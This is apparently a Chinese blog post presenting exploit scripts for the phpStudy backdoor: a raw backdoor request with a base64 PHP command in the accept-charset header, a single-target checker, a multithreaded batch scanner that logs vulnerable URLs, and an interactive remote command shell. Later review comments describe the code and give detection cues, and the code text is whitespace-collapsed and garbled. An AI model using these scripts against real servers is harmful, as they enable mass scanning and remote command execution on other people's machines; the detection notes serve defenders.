phpstudy后门rce批量利用脚本的实现
写两个：一个批量检测的，一个交互式 shell 的。
目前用 py（Qt）写的图形化版本还有点问题。
后门包:
GET/HTTP/1.1
Host:127.0.0.1
User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:55.0)Gecko/20100101Firefox/55.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection:close
accept-charset:ZWNobyBzeXN0ZW0oIm5ldCB1c2VyIik7
Accept-Encoding:gzip,deflate
Upgrade-Insecure-Requests:1
执行那段代码即可写入 shell。
晚上抽点空，简单写个发包的 py 脚本：
# Review note (defender-facing): whitespace-collapsed copy of the blog's first probe script.
# Tokens are fused (`importbase64`, `defwrite_shell`), so it is not runnable as shown and is
# kept verbatim below.  What the visible text shows the code doing:
#   * base64-encodes the PHP snippet `echo "qing";` and places it in the `accept-charset`
#     request header of a GET to `<url>/index.php` (`verify=False`, 30 s timeout);
#   * treats the marker string `qing` in the response body as success and appends the URL
#     to `success.txt`; the bare `except:` reports every other failure as "Timeout";
#   * `threading` and `queue` are imported but unused in this version.
# Detection cue: a genuine `Accept-Charset` value is a charset name, so base64 text in that
# header is the request signature to alert on; the server-side remedy is replacing the
# backdoored phpstudy install.  The Chinese comment `#卿博客:...` is the author's blog link.
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importqueue print("======PhpstudyBackdoorExploit============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") payload="echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } defwrite_shell(url,headers): try: r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30) if"qing"inr.text: print('[+]BackDoorsuccessful:'+url+'===============[+]\n') withopen('success.txt','a')asf: f.write(url+'\n') else: print('[-]BackDoorfailed:'+url+'[-]\n') except: print('[-]Timeout:'+url+'[-]\n') url="http://xxx" write_shell(url=url,headers=headers)
界面优化、改成多线程、批量读取文本文件后的代码：
# Review note (defender-facing): whitespace-collapsed copy of the blog's batch variant; kept
# verbatim, not runnable as shown.  Differences from the single-URL version visible here:
#   * `write_shell(url)` now builds the headers itself (same base64 PHP marker snippet in
#     `accept-charset`, same GET to `<url>/index.php`, same `success.txt` bookkeeping);
#   * `main()` reads one URL per line from `url.txt` and runs `write_shell` over them with a
#     5-worker pool from the third-party `threadpool` package; `threading` is imported but unused;
#   * inside `main()` the name `requests` is rebound to the pool's request list, shadowing the
#     `requests` module locally (harmless here because `write_shell` resolves the global);
#   * the trailing `#线程队列部分` block ("thread-queue section") is a commented-out
#     `threading.Thread` alternative.
# Detection cue is unchanged: base64 text in the `accept-charset` request header; a batch run
# shows up as many near-identical GETs for `/index.php` with that header from one source.
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importthreadpool print("======PhpstudyBackdoorExploit============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") defwrite_shell(url): payload="echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } try: r=requests.get(url=url+'/index.php',headers=headers,verify=False,timeout=30) if"qing"inr.text: print('[+]BackDoorsuccessful:'+url+'===============[+]\n') withopen('success.txt','a')asf: f.write(url+'\n') else: print('[-]BackDoorfailed:'+url+'[-]\n') except: print('[-]Timeout:'+url+'[-]\n') #url="http://xxx" #write_shell(url=url,headers=headers) defmain(): withopen('url.txt','r')asf: lines=f.read().splitlines() task_pool=threadpool.ThreadPool(5) requests=threadpool.makeRequests(write_shell,lines) forreqinrequests: task_pool.putRequest(req) task_pool.wait() if__name__=='__main__': main() #线程队列部分 #th=[] #th_num=10 #forxinrange(th_num): #t=threading.Thread(target=write_shell) #th.append(t) #forxinrange(th_num): #th[x].start() #forxinrange(th_num): #th[x].join()
你也可以加上读取 php 文件名字典的功能，这个很简单，没啥可说的。
下一个是交互式 shell：
# Review note (defender-facing): whitespace-collapsed copy of the blog's interactive variant;
# kept verbatim, not runnable as shown.  What the visible text shows:
#   * `main()` prompts for a URL and a PHP payload (a `system("whoami")` echo when the input
#     is blank), brackets it with `echo "qing";` markers, base64-encodes it and puts it in the
#     `accept-charset` header;
#   * `os_shell()` sends a single GET to `<url>/phpinfo.php` (`verify=False`, 10 s timeout),
#     pulls the text between the two `qing` markers with `re.findall(..., re.S)` and prints
#     it; the bare `except:` reports every failure as a timeout;
#   * the `payload` parameter of `os_shell` is unused (the encoded value is already in
#     `headers`), and `threading`/`threadpool` are imported but unused.
# Detection/forensics cue: the same base64 `accept-charset` signature, here against
# `/phpinfo.php`; decoding the header value recovers the command that was run, and the
# marker strings `qing` bracket the command output in the response.
#!/usr/bin/envpython3 #-*-encoding:utf-8-*- #卿博客:https://www.cnblogs.com/-qing-/ importbase64 importrequests importthreading importthreadpool importre print("======PhpstudyBackdoorExploit---os-shell============\n") print("===========ByQing=================\n") print("=====Blog:https://www.cnblogs.com/-qing-/==\n") defos_shell(url,headers,payload): try: r=requests.get(url=url+'/phpinfo.php',headers=headers,verify=False,timeout=10) #print(r.text) res=re.findall("qing(.*?)qing",r.text,re.S) print("[+]===========TheResponse:==========[+]\n") res="".join(res) print(res) except: print("[-]===========Failed!Timeout...==========[-]\n") defmain(): url=input("inputtheUrl,example:\"http://127.0.0.1/\"\n") payload=input("inputthepayload,default:echosystem(\"whoami\");\n") de_payload="echo\"qing\";system(\"whoami\");echo\"qing\";" ifpayload.strip()=='': payload=de_payload payload="echo\"qing\";"+payload+"echo\"qing\";" payload=base64.b64encode(payload.encode('utf-8')) payload=str(payload,'utf-8') headers={ 'Upgrade-Insecure-Requests':'1', 'User-Agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/75.0.3770.100Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Accept-Language':'zh-CN,zh;q=0.9', 'accept-charset':payload, 'Accept-Encoding':'gzip,deflate', 'Connection':'close', } os_shell(url=url,headers=headers,payload=payload) if__name__=='__main__': main()